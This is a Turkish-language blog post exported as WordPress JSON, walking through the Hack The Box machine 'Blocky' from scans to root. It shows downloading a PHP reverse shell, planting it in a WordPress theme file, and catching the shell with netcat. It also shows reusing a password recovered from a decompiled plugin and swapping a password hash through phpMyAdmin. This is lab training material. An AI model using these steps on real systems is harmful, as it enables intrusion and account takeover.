{"id":1436,"date":"2021-07-29T19:25:19","date_gmt":"2021-07-29T19:25:19","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1436"},"modified":"2022-06-11T09:16:16","modified_gmt":"2022-06-11T09:16:16","slug":"blocky","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/07\/29\/blocky\/","title":{"rendered":"Blocky"},"content":{"rendered":"<table>\n<thead>\n<tr>\n<th>Makine Ad\u0131<\/th>\n<th>Seviye<\/th>\n<th>OS<\/th>\n<th>Logo<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><a href=\"https:\/\/app.hackthebox.eu\/machines\/Blocky\" title=\"Blocky\">Blocky<\/a> - HTB<\/td>\n<td>Kolay<\/td>\n<td>Linux<\/td>\n<td><img decoding=\"async\" src=\"https:\/\/www.hackthebox.eu\/storage\/avatars\/f412784c311bdf52c3655381d2c9cd21.png\" alt=\"\" \/><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>Walkthrough<\/h2>\n<p>Nmap taramas\u0131 ile ba\u015flayal\u0131m.<\/p>\n<pre><code class=\"language-sh\">Starting Nmap 7.91 ( https:\/\/nmap.org ) at 2021-07-29 14:08 EDT\nNmap scan report for 10.10.10.37\nHost is up (0.070s latency).\nNot shown: 65530 filtered ports\nPORT      STATE  SERVICE   VERSION\n21\/tcp    open   ftp       ProFTPD 1.3.5a\n22\/tcp    open   ssh       OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)\n|   256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)\n|_  256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)\n80\/tcp    open   http      Apache httpd 2.4.18 ((Ubuntu))\n|_http-generator: WordPress 4.8\n|_http-server-header: Apache\/2.4.18 (Ubuntu)\n|_http-title: BlockyCraft &amp;#8211; Under Construction!\n8192\/tcp  closed sophos\n25565\/tcp open   minecraft Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0\/20)\nDevice type: general purpose|WAP|specialized|storage-misc|broadband router|printer\nRunning (JUST GUESSING): Linux 3.X|4.X|5.X|2.6.X (94%), Asus embedded (90%), Crestron 2-Series (89%), HP embedded (89%)\nOS CPE: cpe:\/o:linux:linux_kernel:3 cpe:\/o:linux:linux_kernel:4 cpe:\/o:linux:linux_kernel cpe:\/h:asus:rt-ac66u cpe:\/o:crestron:2_series cpe:\/h:hp:p2000_g3 cpe:\/o:linux:linux_kernel:5.1 cpe:\/o:linux:linux_kernel:2.6\nAggressive OS guesses: Linux 3.10 - 4.11 (94%), Linux 3.13 (94%), Linux 3.13 or 4.2 (94%), Linux 4.2 (94%), Linux 4.4 (94%), Linux 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.12 (91%), Linux 3.2 - 4.9 (91%), Linux 3.8 - 3.11 (91%)\nNo exact OS matches for host (test conditions non-ideal).\nNetwork Distance: 2 hops\nService Info: OSs: Unix, Linux; CPE: cpe:\/o:linux:linux_kernel\n\nTRACEROUTE (using port 80\/tcp)\nHOP RTT      ADDRESS\n1   70.06 ms 10.10.14.1\n2   70.71 ms 10.10.10.37\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 117.73 seconds\n<\/code><\/pre>\n<p>nmap \u00e7\u0131kt\u0131lar\u0131ndaki versionlar\u0131 ara\u015ft\u0131rd\u0131m ancak public bir exploit yoktu bunun \u00fczerine 80'i ke\u015ffe ba\u015flad\u0131m. Bir wordpress vard\u0131 ve wpscan ile kullan\u0131c\u0131 tespit ettim. Daha sonras\u0131nda bu kullan\u0131c\u0131ya bruteforce denedim ancak ba\u015far\u0131l\u0131 olamad\u0131m. Ayn\u0131 ba\u015far\u0131s\u0131zl\u0131\u011f\u0131 ilgili kullan\u0131c\u0131yla ftp ve ssh'da da ya\u015fad\u0131m.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Blocky]\n\u2514\u2500# wpscan --url http:\/\/10.10.10.37\/ -e vp,vt,cb,dbe,u,m\n_______________________________________________________________\n         __          _______   _____\n         \\ \\        \/ \/  __ \\ \/ ____|\n          \\ \\  \/\\  \/ \/| |__) | (___   ___  __ _ _ __ \u00ae\n           \\ \\\/  \\\/ \/ |  ___\/ \\___ \\ \/ __|\/ _` | &#039;_ \\\n            \\  \/\\  \/  | |     ____) | (__| (_| | | | |\n             \\\/  \\\/   |_|    |_____\/ \\___|\\__,_|_| |_|\n\n         WordPress Security Scanner by the WPScan Team\n                         Version 3.8.17\n       Sponsored by Automattic - https:\/\/automattic.com\/\n       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart\n_______________________________________________________________\n\n[i] It seems like you have not updated the database for some time.\n[?] Do you want to update now? [Y]es [N]o, default: [N]n\n[+] URL: http:\/\/10.10.10.37\/ [10.10.10.37]\n[+] Started: Thu Jul 29 14:08:18 2021\n\nInteresting Finding(s):\n\n[+] Headers\n | Interesting Entry: Server: Apache\/2.4.18 (Ubuntu)\n | Found By: Headers (Passive Detection)\n | Confidence: 100%\n\n[+] XML-RPC seems to be enabled: http:\/\/10.10.10.37\/xmlrpc.php\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n | References:\n |  - http:\/\/codex.wordpress.org\/XML-RPC_Pingback_API\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_ghost_scanner\/\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/dos\/http\/wordpress_xmlrpc_dos\/\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_xmlrpc_login\/\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_pingback_access\/\n\n[+] WordPress readme found: http:\/\/10.10.10.37\/readme.html\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n\n[+] Upload directory has listing enabled: http:\/\/10.10.10.37\/wp-content\/uploads\/\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n\n[+] The external WP-Cron seems to be enabled: http:\/\/10.10.10.37\/wp-cron.php\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 60%\n | References:\n |  - https:\/\/www.iplocation.net\/defend-wordpress-from-ddos\n |  - https:\/\/github.com\/wpscanteam\/wpscan\/issues\/1299\n\n[+] WordPress version 4.8 identified (Insecure, released on 2017-06-08).\n | Found By: Rss Generator (Passive Detection)\n |  - http:\/\/10.10.10.37\/index.php\/feed\/, &lt;generator&gt;https:\/\/wordpress.org\/?v=4.8&lt;\/generator&gt;\n |  - http:\/\/10.10.10.37\/index.php\/comments\/feed\/, &lt;generator&gt;https:\/\/wordpress.org\/?v=4.8&lt;\/generator&gt;\n\n[+] WordPress theme in use: twentyseventeen\n | Location: http:\/\/10.10.10.37\/wp-content\/themes\/twentyseventeen\/\n | Last Updated: 2021-04-27T00:00:00.000Z\n | Readme: http:\/\/10.10.10.37\/wp-content\/themes\/twentyseventeen\/README.txt\n | [!] The version is out of date, the latest version is 2.7\n | Style URL: http:\/\/10.10.10.37\/wp-content\/themes\/twentyseventeen\/style.css?ver=4.8\n | Style Name: Twenty Seventeen\n | Style URI: https:\/\/wordpress.org\/themes\/twentyseventeen\/\n | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...\n | Author: the WordPress team\n | Author URI: https:\/\/wordpress.org\/\n |\n | Found By: Css Style In Homepage (Passive Detection)\n |\n | Version: 1.3 (80% confidence)\n | Found By: Style (Passive Detection)\n |  - http:\/\/10.10.10.37\/wp-content\/themes\/twentyseventeen\/style.css?ver=4.8, Match: &#039;Version: 1.3&#039;\n\n[+] Enumerating Vulnerable Plugins (via Passive Methods)\n\n[i] No plugins Found.\n\n[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)\n Checking Known Locations - Time: 00:00:07 &lt;==============================================================================================================================================================&gt; (355 \/ 355) 100.00% Time: 00:00:07\n[+] Checking Theme Versions (via Passive and Aggressive Methods)\n\n[i] No themes Found.\n\n[+] Enumerating Config Backups (via Passive and Aggressive Methods)\n Checking Config Backups - Time: 00:00:02 &lt;===============================================================================================================================================================&gt; (137 \/ 137) 100.00% Time: 00:00:02\n\n[i] No Config Backups Found.\n\n[+] Enumerating DB Exports (via Passive and Aggressive Methods)\n Checking DB Exports - Time: 00:00:01 &lt;=====================================================================================================================================================================&gt; (71 \/ 71) 100.00% Time: 00:00:01\n\n[i] No DB Exports Found.\n\n[+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be set to &quot;Plain&quot; for those to be detected)\n Brute Forcing Attachment IDs - Time: 00:00:02 &lt;==========================================================================================================================================================&gt; (100 \/ 100) 100.00% Time: 00:00:02\n\n[i] No Medias Found.\n\n[+] Enumerating Users (via Passive and Aggressive Methods)\n Brute Forcing Author IDs - Time: 00:00:00 &lt;================================================================================================================================================================&gt; (10 \/ 10) 100.00% Time: 00:00:00\n\n[i] User(s) Identified:\n\n[+] notch\n | Found By: Author Posts - Author Pattern (Passive Detection)\n | Confirmed By:\n |  Wp Json Api (Aggressive Detection)\n |   - http:\/\/10.10.10.37\/index.php\/wp-json\/wp\/v2\/users\/?per_page=100&amp;page=1\n |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)\n |  Login Error Messages (Aggressive Detection)\n\n[+] Notch\n | Found By: Rss Generator (Passive Detection)\n | Confirmed By: Login Error Messages (Aggressive Detection)\n\n[!] No WPScan API Token given, as a result vulnerability data has not been output.\n[!] You can get a free API token with 25 daily requests by registering at https:\/\/wpscan.com\/register\n\n[+] Finished: Thu Jul 29 14:08:38 2021\n[+] Requests Done: 722\n[+] Cached Requests: 10\n[+] Data Sent: 182.064 KB\n[+] Data Received: 660.597 KB\n[+] Memory used: 239.707 MB\n[+] Elapsed time: 00:00:19\n<\/code><\/pre>\n<p>Dizin ve dosya ke\u015ffinde a\u015fa\u011f\u0131daki sonu\u00e7lar\u0131 ald\u0131m.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Blocky]\n\u2514\u2500# gobuster dir --url http:\/\/10.10.10.37 --add-slash --expanded --follow-redirect --status-codes-blacklist 404 --extensions php,sh,txt,sql,conf,php5,zip,rar --timeout 20s -t 20 -w \/usr\/share\/wordlists\/dirb\/big.txt --no-error | tee gobuster1\n\n===============================================================\nGobuster v3.1.0\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/10.10.10.37\n[+] Method:                  GET\n[+] Threads:                 20\n[+] Wordlist:                \/usr\/share\/wordlists\/dirb\/big.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.1.0\n[+] Extensions:              txt,sql,conf,php5,zip,rar,php,sh\n[+] Add Slash:               true\n[+] Follow Redirect:         true\n[+] Expanded:                true\n[+] Timeout:                 20s\n===============================================================\n2021\/07\/29 14:24:33 Starting gobuster in directory enumeration mode\n===============================================================\nhttp:\/\/10.10.10.37\/.htaccess.zip        (Status: 403) [Size: 299]\nhttp:\/\/10.10.10.37\/.htpasswd\/           (Status: 403) [Size: 296]\nhttp:\/\/10.10.10.37\/.htaccess\/           (Status: 403) [Size: 296]\nhttp:\/\/10.10.10.37\/.htaccess.rar        (Status: 403) [Size: 299]\nhttp:\/\/10.10.10.37\/.htaccess.php        (Status: 403) [Size: 299]\nhttp:\/\/10.10.10.37\/.htaccess.txt        (Status: 403) [Size: 299]\nhttp:\/\/10.10.10.37\/.htaccess.conf       (Status: 403) [Size: 300]\nhttp:\/\/10.10.10.37\/.htpasswd.zip        (Status: 403) [Size: 299]\nhttp:\/\/10.10.10.37\/.htaccess.sh         (Status: 403) [Size: 298]\nhttp:\/\/10.10.10.37\/.htpasswd.php        (Status: 403) [Size: 299]\nhttp:\/\/10.10.10.37\/.htaccess.sql        (Status: 403) [Size: 299]\nhttp:\/\/10.10.10.37\/.htpasswd.sql        (Status: 403) [Size: 299]\nhttp:\/\/10.10.10.37\/.htpasswd.conf       (Status: 403) [Size: 300]\nhttp:\/\/10.10.10.37\/.htpasswd.php5       (Status: 403) [Size: 300]\nhttp:\/\/10.10.10.37\/.htpasswd.rar        (Status: 403) [Size: 299]\nhttp:\/\/10.10.10.37\/.htaccess.php5       (Status: 403) [Size: 300]\nhttp:\/\/10.10.10.37\/.htpasswd.sh         (Status: 403) [Size: 298]\nhttp:\/\/10.10.10.37\/.htpasswd.txt        (Status: 403) [Size: 299]\nhttp:\/\/10.10.10.37\/icons\/               (Status: 403) [Size: 292]\nhttp:\/\/10.10.10.37\/index.php            (Status: 200) [Size: 52256]\nhttp:\/\/10.10.10.37\/javascript\/          (Status: 403) [Size: 297]  \nhttp:\/\/10.10.10.37\/license.txt          (Status: 200) [Size: 19935]\nhttp:\/\/10.10.10.37\/phpmyadmin\/          (Status: 200) [Size: 10328]\nhttp:\/\/10.10.10.37\/plugins\/             (Status: 200) [Size: 745]  \nhttp:\/\/10.10.10.37\/server-status\/       (Status: 403) [Size: 300]  \nhttp:\/\/10.10.10.37\/wiki\/                (Status: 200) [Size: 380]  \nhttp:\/\/10.10.10.37\/wp-content\/          (Status: 200) [Size: 0]    \nhttp:\/\/10.10.10.37\/wp-config.php        (Status: 200) [Size: 0]    \nhttp:\/\/10.10.10.37\/wp-includes\/         (Status: 200) [Size: 40839]\nhttp:\/\/10.10.10.37\/wp-admin\/            (Status: 200) [Size: 2402] \nhttp:\/\/10.10.10.37\/wp-login.php         (Status: 200) [Size: 2402] \nhttp:\/\/10.10.10.37\/wp-trackback.php     (Status: 200) [Size: 135]  \nhttp:\/\/10.10.10.37\/xmlrpc.php           (Status: 405) [Size: 42]   \n\n===============================================================\n2021\/07\/29 14:41:58 Finished\n===============================================================\n<\/code><\/pre>\n<p><strong><a href=\"http:\/\/10.10.10.37\/wiki\/\">http:\/\/10.10.10.37\/wiki\/<\/a><\/strong> sayfas\u0131nda pluginlerden bahsediyordu. Bunun \u00fczerine <strong><a href=\"http:\/\/10.10.10.37\/plugins\/\">http:\/\/10.10.10.37\/plugins\/<\/a><\/strong> sayfas\u0131na gittim ve jar dosyalar\u0131 buldum. Bu arada andorid app s\u0131zma testlerine bay\u0131l\u0131r\u0131m.<br \/>\nJava kodlar\u0131na ula\u015fmak i\u00e7in a\u015fa\u011f\u0131daki ad\u0131mlar\u0131 izledim.<\/p>\n<pre><code class=\"language-sh\">\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Blocky]\n\u2514\u2500# wget https:\/\/github.com\/java-decompiler\/jd-gui\/releases\/download\/v1.6.6\/jd-gui-1.6.6.jar\n--2021-07-29 14:44:34--  https:\/\/github.com\/java-decompiler\/jd-gui\/releases\/download\/v1.6.6\/jd-gui-1.6.6.jar\nResolving github.com (github.com)... 140.82.121.3\nConnecting to github.com (github.com)|140.82.121.3|:443... connected.\nHTTP request sent, awaiting response... 302 Found\nLocation: https:\/\/github-releases.githubusercontent.com\/32844456\/012e1e80-272e-11ea-9941-5a32c9f59220?X-Amz-Algorithm=AWS4-HMAC-SHA256&amp;X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20210729%2Fus-east-1%2Fs3%2Faws4_request&amp;X-Amz-Date=20210729T184433Z&amp;X-Amz-Expires=300&amp;X-Amz-Signature=5c5fe4d76ef0801b9ea52003c5f8a659722fad297a9660e9e5423b2671b8c88d&amp;X-Amz-SignedHeaders=host&amp;actor_id=0&amp;key_id=0&amp;repo_id=32844456&amp;response-content-disposition=attachment%3B%20filename%3Djd-gui-1.6.6.jar&amp;response-content-type=application%2Foctet-stream [following]\n--2021-07-29 14:44:35--  https:\/\/github-releases.githubusercontent.com\/32844456\/012e1e80-272e-11ea-9941-5a32c9f59220?X-Amz-Algorithm=AWS4-HMAC-SHA256&amp;X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20210729%2Fus-east-1%2Fs3%2Faws4_request&amp;X-Amz-Date=20210729T184433Z&amp;X-Amz-Expires=300&amp;X-Amz-Signature=5c5fe4d76ef0801b9ea52003c5f8a659722fad297a9660e9e5423b2671b8c88d&amp;X-Amz-SignedHeaders=host&amp;actor_id=0&amp;key_id=0&amp;repo_id=32844456&amp;response-content-disposition=attachment%3B%20filename%3Djd-gui-1.6.6.jar&amp;response-content-type=application%2Foctet-stream\nResolving github-releases.githubusercontent.com (github-releases.githubusercontent.com)... 185.199.110.154, 185.199.111.154, 185.199.108.154, ...\nConnecting to github-releases.githubusercontent.com (github-releases.githubusercontent.com)|185.199.110.154|:443... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 3238491 (3.1M) [application\/octet-stream]\nSaving to: \u2018jd-gui-1.6.6.jar\u2019\n\njd-gui-1.6.6.jar                                            100%[=========================================================================================================================================&gt;]   3.09M   511KB\/s    in 5.0s    \n\n2021-07-29 14:44:40 (628 KB\/s) - \u2018jd-gui-1.6.6.jar\u2019 saved [3238491\/3238491]\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Blocky]\n\u2514\u2500# java -jar jd-gui-1.6.6.jar <\/code><\/pre>\n<p>Art\u0131k java kodlar\u0131na ula\u015ft\u0131m. BlockyCore.jar uygulas\u0131n\u0131 a\u00e7t\u0131\u011f\u0131mda kabak gibi \u015fifreye uka\u015ft\u0131m. Kodlar a\u015fa\u011f\u0131da...<\/p>\n<pre><code class=\"language-sh\">package com.myfirstplugin;\n\npublic class BlockyCore {\n  public String sqlHost = &quot;localhost&quot;;\n\n  public String sqlUser = &quot;root&quot;;\n\n  public String sqlPass = &quot;8YsqfCTnvxAUeduzjNSXe22&quot;;\n\n  public void onServerStart() {}\n\n  public void onServerStop() {}\n\n  public void onPlayerJoin() {\n    sendMessage(&quot;TODO get username&quot;, &quot;Welcome to the BlockyCraft!!!!!!!&quot;);\n  }\n\n  public void sendMessage(String username, String message) {}\n}<\/code><\/pre>\n<p>gobuster \u00e7\u0131kt\u0131lar\u0131nda phpmyadmin bulmu\u015ftum.Giri\u015f yapt\u0131m ve wordpress'deki kullan\u0131c\u0131n\u0131n hash;'ini ilk ba\u015fta k\u0131rmaya \u00e7al\u0131\u015ft\u0131m, ba\u015far\u0131s\u0131z olunca hash'i kopyalad\u0131m ve kendime <strong><a href=\"https:\/\/www.useotools.com\/wordpress-password-hash-generator\/output\">https:\/\/www.useotools.com\/wordpress-password-hash-generator\/output<\/a><\/strong> adresinden de\u011feri kuday olan bir hash \u00fcrettim.<\/p>\n<pre><code>$P$BymHlBZYz9WBhKzdh6RVBHDjFAEtgz0(kuday)<\/code><\/pre>\n<p>WordPress uygulamas\u0131na giri\u015f yap\u0131nca footer.php k\u0131sm\u0131na reverse shell g\u00f6md\u00fcm ve shell ald\u0131m.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Blocky]\n\u2514\u2500# wget https:\/\/raw.githubusercontent.com\/pentestmonkey\/php-reverse-shell\/master\/php-reverse-shell.php                                                           \n--2021-07-29 14:49:45--  https:\/\/raw.githubusercontent.com\/pentestmonkey\/php-reverse-shell\/master\/php-reverse-shell.php\nResolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.109.133, 185.199.110.133, 185.199.111.133, ...\nConnecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.109.133|:443... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 5491 (5.4K) [text\/plain]\nSaving to: \u2018php-reverse-shell.php\u2019\n\nphp-reverse-shell.php                                       100%[=========================================================================================================================================&gt;]   5.36K  --.-KB\/s    in 0.001s  \n\n2021-07-29 14:49:45 (8.03 MB\/s) - \u2018php-reverse-shell.php\u2019 saved [5491\/5491]<\/code><\/pre>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Blocky]\n\u2514\u2500# nc -lvp 1234\nlistening on [any] 1234 ...\n10.10.10.37: inverse host lookup failed: Unknown host\nconnect to [10.10.14.13] from (UNKNOWN) [10.10.10.37] 46882\nLinux Blocky 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU\/Linux\n 13:52:43 up 47 min,  0 users,  load average: 0.09, 3.38, 6.05\nUSER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n\/bin\/sh: 0: can&#039;t access tty; job control turned off\n$ id\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n$ python -c &#039;import pty;\n> pty.spawn(&quot;\/bin\/bash&quot;)&#039;\n\/bin\/sh: 2: python: not found\n$ which python\n$ which python3\n\/usr\/bin\/python3\n$ python3 -c &#039;import pty; pty.spawn(&quot;\/bin\/bash&quot;)&#039;\nwww-data@Blocky:\/$ <\/code><\/pre>\n<p>\u0130lk flagi okumak istedim ancak hata ile kar\u015f\u0131la\u015ft\u0131m. Bunun \u00fczerine elde etmi\u015f oldu\u011fum ilk parolay\u0131 notch kullan\u0131c\u0131s\u0131 i\u00e7in denedim.<\/p>\n<pre><code class=\"language-sh\">www-data@Blocky:\/home\/notch$ cat user.txt\ncat user.txt\ncat: user.txt: Permission denied\nwww-data@Blocky:\/home\/notch$ ls -al \nls -al\ntotal 48\ndrwxr-xr-x 5 notch notch 4096 Jul  2  2017 .\ndrwxr-xr-x 3 root  root  4096 Jul  2  2017 ..\n-rw------- 1 notch notch    1 Dec 24  2017 .bash_history\n-rw-r--r-- 1 notch notch  220 Jul  2  2017 .bash_logout\n-rw-r--r-- 1 notch notch 3771 Jul  2  2017 .bashrc\ndrwx------ 2 notch notch 4096 Jul  2  2017 .cache\n-rw------- 1 root  root   369 Jul  2  2017 .mysql_history\ndrwxrwxr-x 2 notch notch 4096 Jul  2  2017 .nano\n-rw-r--r-- 1 notch notch  655 Jul  2  2017 .profile\n-rw-rw-r-- 1 notch notch   66 Jul  2  2017 .selected_editor\n-rw-r--r-- 1 notch notch    0 Jul  2  2017 .sudo_as_admin_successful\ndrwxrwxr-x 7 notch notch 4096 Jul  2  2017 minecraft\n-r-------- 1 notch notch   32 Jul  2  2017 user.txt\nwww-data@Blocky:\/home\/notch$ su notch\nsu notch\nPassword: 8YsqfCTnvxAUeduzjNSXe22\n\nnotch@Blocky:~$ <\/code><\/pre>\n<p>Bu esnada ssh ile devam ettim.<\/p>\n<pre><code class=\"language-sh\">\n\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Blocky]\n\u2514\u2500# ssh notch@10.10.10.37                                                                                                                                                                                                               130 \u2a2f\nThe authenticity of host &#039;10.10.10.37 (10.10.10.37)&#039; can&#039;t be established.\nECDSA key fingerprint is SHA256:lg0igJ5ScjVO6jNwCH\/OmEjdeO2+fx+MQhV\/ne2i900.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added &#039;10.10.10.37&#039; (ECDSA) to the list of known hosts.\nnotch@10.10.10.37&#039;s password: \nPermission denied, please try again.\nnotch@10.10.10.37&#039;s password: \nWelcome to Ubuntu 16.04.2 LTS (GNU\/Linux 4.4.0-62-generic x86_64)\n\n * Documentation:  https:\/\/help.ubuntu.com\n * Management:     https:\/\/landscape.canonical.com\n * Support:        https:\/\/ubuntu.com\/advantage\n\n7 packages can be updated.\n7 updates are security updates.\n\nLast login: Sun Dec 24 09:34:35 2017\nnotch@Blocky:~$ ls\nminecraft  user.txt\nnotch@Blocky:~$ cat user.txt \n59fe***************************\nnotch@Blocky:~$ <\/code><\/pre>\n<p>Daha sonras\u0131nda kolay bir \u015fekilde root oldum.<\/p>\n<pre><code class=\"language-sh\">notch@Blocky:~$ sudo -l\n[sudo] password for notch: \nMatching Defaults entries for notch on Blocky:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser notch may run the following commands on Blocky:\n    (ALL : ALL) ALL\nnotch@Blocky:~$ sudo su\nroot@Blocky:\/home\/notch# id\nuid=0(root) gid=0(root) groups=0(root)\nroot@Blocky:\/home\/notch# cd \/root\/\nroot@Blocky:~# ls\nroot.txt\nroot@Blocky:~# cat root.txt \n0a96*********************************\nroot@Blocky:~# \n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Makine Ad\u0131 Seviye OS Logo Blocky &#8211; HTB Kolay Linux Walkthrough Nmap taramas\u0131 ile ba\u015flayal\u0131m. Starting Nmap 7.91 ( https:\/\/nmap.org ) at 2021-07-29 14:08 EDT&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/07\/29\/blocky\/\">Devam\u0131n\u0131 oku<span class=\"screen-reader-text\">Blocky<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[498],"tags":[584,63],"class_list":["post-1436","post","type-post","status-publish","format-standard","hentry","category-walkthrough","tag-java-reverse-engineering","tag-reverse-engineering","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1436","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1436"}],"version-history":[{"count":2,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1436\/revisions"}],"predecessor-version":[{"id":1891,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1436\/revisions\/1891"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1436"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1436"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1436"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}